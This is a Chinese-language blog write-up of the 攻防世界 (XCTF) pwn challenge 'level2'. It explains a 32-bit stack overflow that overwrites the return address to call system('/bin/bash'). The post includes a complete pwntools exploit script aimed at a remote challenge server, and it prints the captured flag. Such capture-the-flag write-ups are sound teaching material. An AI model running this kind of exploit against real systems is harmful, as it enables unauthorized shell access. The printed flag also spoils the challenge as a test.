攻防世界pwn pwn_level2

最新推荐文章于 2023-12-28 21:22:18 发布
最新推荐文章于 2023-12-28 21:22:18 发布
阅读量313 收藏
点赞数
分类专栏: CTF的writeup 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44370676/article/details/107999471
版权

首先下下来的文件查壳以及查保护机制

接着,进入IDA,F5分析

点进vulnerable_function看一下

看到这里可以知道buf是程序输入的字符串,长度为0x88,read最多可以读入0x100个字符。点进buf看下

也就是r是返回地址,也是需要覆盖的,s保存的即是main函数的ebp,所以我们需要构造的payload包括长度0x88 + 4的任意数据

以及我们想要执行的函数的地址。可以跟level0不一样的是,这道题并没有明确给我们提供一个这样的函数。所以我们得自己构造了,按shift+F12查看下字符串

看到了下面的/bin/bash,而程序里又有system函数,所以这里我们得构造一个system("/bin/bash"),对应的汇编指令为

push    offset db'/bin/bash'
call    _system

也就是我们覆盖的返回地址为call _system指令的地址(注意是call _system指令的地址,不是system函数的入口地址)。整个程序有2个地方出现了call _system,一个在main函数里

另一个在vulnerable_function里

也就是覆盖的返回地址用0804845C和0804849E都可以,那最后就是让/bin/bash的地址入栈,因为push指令在call指令执行之前,所以/bin/bash的地址跟在返回地址之后就行,整个payload的结构也就是:0x88 +4的任意数据 + call system的地址 + /bin/bash的地址

代码为:

from pwn import *

if __name__ == '__main__':
    con = remote('220.249.52.133',36309)
    payload = b'A' * (0x88 + 4)
    payload += b'\x9E\x84\x04\x08' # call system地址
    payload += b'\x24\xA0\x04\x08' # /bin/bash地址

    con.send(payload)
    con.interactive()

这里注意x86平台为小端序。

执行程序即可拿到shell,输入cat flag

cyberpeace{28feeb6a836ee8cf5867b36b8010b52e}

I still …
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1427
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
pwn 例题level2解析
m0_67423114的博客
04-26 427
下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料。看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址。可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看。通过这种套路,确实获得了/bin/sh的地址!
pwn题解level(2)
qq_43627239的博客
07-25 565
今天oj里边的level2和level3的32位和64位四道题 写一下32位 其中包含libc 写题解之前 先补充两个内容 1.checksec 是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为canary,所以如果开...
pwn level1、level2
qq_43613772的博客
07-24 976
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2444
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
pwn level2
最新发布
2201_75387521的博客
12-28 326
先找system函数,发现它的参数待输入,然后shift + Fn + F12 查找特殊字符发现bin_sh,因此希望bin_sh能成为system的参数。其他都是基本的缓冲区溢出。
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
xctf pwn level2
weixin_64286326的博客
01-29 986
前言:只能说是看着WP侥幸做出来了,里面很多不懂的地方. 1 分析 首先下载把环境附件整下来 在linux下打开,checksec 32位的,拖进ida 进去后汇编界面根本看不懂,F5查看伪代码 用linux运行也是这样 发现有一个vulnerable_function()函数,点进去看一下 我们可以看出来 栈顶和栈底相差0x88个字节,但是read()却是0x100个字节 r,s分别是返回地址和栈底。 既然这样,我们可以利用栈溢出来g...
攻防世界 Pwn level2
MrTreebook的博客
07-16 497
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
PWN做题笔记3-level2(已修订)
qq_40923256的博客
04-19 2277
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1 32位ELF文件 未开启ALSR ida反汇编: 只有main函数,但是给出了system函数,因此是一个ret2libc类型的题目,目标是通过溢出构造_system函数的参数并调用。 查找/bin/sh字符串,地址0x0804A024: _system地址0x0804832..
攻防世界PWN-level2
Deeeelete的博客
11-13 770
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 450
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界pwn新手练习(level2)
BurYiA的博客
12-24 711
level2 可以看到题上已经有提示了(ROP) 我们看一下程序的保护状态和它的运行情况 开了NX,问题不大。运行可以发现有一个输入点 放IDA里看看 在字符串窗口可以发现有system和**/bin/sh** 这就很舒服了呀,再结合一下题目给的提示,构造ROP链就行 1 1 ...
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 862
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1075
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值